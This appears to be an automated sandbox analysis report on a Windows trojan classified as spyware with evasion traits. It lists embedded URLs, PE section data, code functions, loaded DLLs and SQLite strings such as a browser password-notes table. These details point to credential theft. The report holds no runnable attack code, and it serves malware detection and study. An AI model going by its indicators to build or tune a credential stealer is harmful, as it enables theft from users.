              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: file.exe, file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: file.exe, 00000000.00000002.2294260699.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
              Source: AKFIDHDG.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: AKFIDHDG.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: AKFIDHDG.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: EGCFIDAFBFBAKFHJEGIJ.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
              Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.drString found in binary or memory: https://support.mozilla.org
              Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
              Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: AKFIDHDG.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.drString found in binary or memory: https://www.mozilla.org
              Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: file.exe, 00000000.00000003.2213778910.000000002FC51000.00000004.00000020.00020000.00000000.sdmp, AFBAFBKEGCFBGCBFIDAKEHDAFC.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
              Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
              Source: AFBAFBKEGCFBGCBFIDAKEHDAFC.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2213778910.000000002FC51000.00000004.00000020.00020000.00000000.sdmp, AFBAFBKEGCFBGCBFIDAKEHDAFC.0.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
              Source: file.exe, 00000000.00000003.2213778910.000000002FC51000.00000004.00000020.00020000.00000000.sdmp, AFBAFBKEGCFBGCBFIDAKEHDAFC.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C6DB700
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6DB8C0 rand_s,NtQueryVirtualMemory,0_2_6C6DB8C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6C6DB910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C67F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C67F280
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040384C0_2_0040384C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EB8330_2_004EB833
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EA8EA0_2_004EA8EA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004418F40_2_004418F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005361230_2_00536123
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005309EF0_2_005309EF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053F9890_2_0053F989
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053A9B40_2_0053A9B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006522E00_2_006522E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053C3FA0_2_0053C3FA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0048A3F40_2_0048A3F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F34D20_2_004F34D2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00537D080_2_00537D08
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053DF100_2_0053DF10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A6F230_2_004A6F23
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044B72B0_2_0044B72B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00533F230_2_00533F23
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00477FCB0_2_00477FCB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6735A00_2_6C6735A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6854400_2_6C685440
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E545C0_2_6C6E545C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E542B0_2_6C6E542B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6EAC000_2_6C6EAC00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B5C100_2_6C6B5C10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6C2C100_2_6C6C2C10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C67D4E00_2_6C67D4E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B6CF00_2_6C6B6CF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6864C00_2_6C6864C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C69D4D00_2_6C69D4D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D34A00_2_6C6D34A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6DC4A00_2_6C6DC4A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C686C800_2_6C686C80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C68FD000_2_6C68FD00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6A05120_2_6C6A0512
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C69ED100_2_6C69ED10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D85F00_2_6C6D85F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B0DD00_2_6C6B0DD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E6E630_2_6C6E6E63
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C67C6700_2_6C67C670
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6C2E4E0_2_6C6C2E4E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6946400_2_6C694640
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C699E500_2_6C699E50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B3E500_2_6C6B3E50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D9E300_2_6C6D9E30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6C56000_2_6C6C5600
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B7E100_2_6C6B7E10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E76E30_2_6C6E76E3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C67BEF00_2_6C67BEF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C68FEF00_2_6C68FEF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D4EA00_2_6C6D4EA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6DE6800_2_6C6DE680
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C695E900_2_6C695E90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C689F000_2_6C689F00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B77100_2_6C6B7710
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C67DFE00_2_6C67DFE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6A6FF00_2_6C6A6FF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6C77A00_2_6C6C77A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6BF0700_2_6C6BF070
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6988500_2_6C698850
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C69D8500_2_6C69D850
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6BB8200_2_6C6BB820
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6C48200_2_6C6C4820
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6878100_2_6C687810
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C69C0E00_2_6C69C0E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B58E00_2_6C6B58E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E50C70_2_6C6E50C7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6A60A00_2_6C6A60A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C68D9600_2_6C68D960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6CB9700_2_6C6CB970
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6EB1700_2_6C6EB170
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C69A9400_2_6C69A940
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C67C9A00_2_6C67C9A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6AD9B00_2_6C6AD9B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B51900_2_6C6B5190
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D29900_2_6C6D2990
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B9A600_2_6C6B9A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C691AF00_2_6C691AF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6BE2F00_2_6C6BE2F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B8AC00_2_6C6B8AC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6722A00_2_6C6722A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6A4AA00_2_6C6A4AA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C68CAB00_2_6C68CAB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E2AB00_2_6C6E2AB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6EBA900_2_6C6EBA90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C68C3700_2_6C68C370
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6753400_2_6C675340
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6BD3200_2_6C6BD320
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E53C80_2_6C6E53C8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C67F3800_2_6C67F380
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C6B94D0 appears 90 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C6ACBE8 appears 134 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00184610 appears 316 times
              Source: file.exe, 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
              Source: file.exe, 00000000.00000002.2294654696.000000006C8F5000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: trzlrlhz ZLIB complexity 0.9949077347285068
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/23@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6C6D7030
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001990A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001990A0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\K5QO88QS.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
              Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: file.exe, 00000000.00000003.2129376335.000000001D788000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144202039.000000001D77B000.00000004.00000020.00020000.00000000.sdmp, IJECBGIJDGCAEBFIIECA.0.dr, FCAAEHJDBKJJKFHJEBKF.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
              Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
              Source: file.exeReversingLabs: Detection: 36%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
